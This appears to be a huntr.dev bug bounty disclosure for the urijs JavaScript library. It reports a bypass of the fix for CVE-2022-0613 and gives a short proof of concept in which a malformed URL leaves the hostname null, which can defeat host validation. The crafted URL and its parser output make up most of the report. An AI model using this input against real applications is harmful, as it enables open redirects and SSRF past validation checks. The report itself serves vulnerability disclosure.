Lucene search

K
huntrHuydoppa5F4DB013-64BD-4A6B-9DAD-870C296B0B02
HistoryMar 01, 2022 - 2:11 p.m.

Open Redirect

2022-03-0114:11:41
huydoppa
www.huntr.dev
22
urijs
open redirect
ssrf
bypass
exploit
bug bounty

EPSS

0.001

Percentile

45.1%

Description

bypass https://huntr.dev/bounties/f53d5c42-c108-40b8-917d-9dad51535083/
urijs fix CVE-2022-0613 , however attacker can bypass to exploit this issue

Proof of Concept

// PoC.js
var URI = require('urijs');
var url = new URI("https::\\\github.com/foo/bar");
console.log(url);

output:
URI {
  _string: '',
  _parts: {
    protocol: 'https',
    username: null,
    password: null,
    hostname: null,
    urn: null,
    port: null,
    path: '/github.com/foo/bar',
    query: null,
    fragment: null,
    preventInvalidHostname: false,
    duplicateQueryParameters: false,
    escapeQuerySpace: true
  },
  _deferred_build: true
}

Impact

Bypass host-validation checks, open redirect, SSRF etc. - depends on the usage of urijs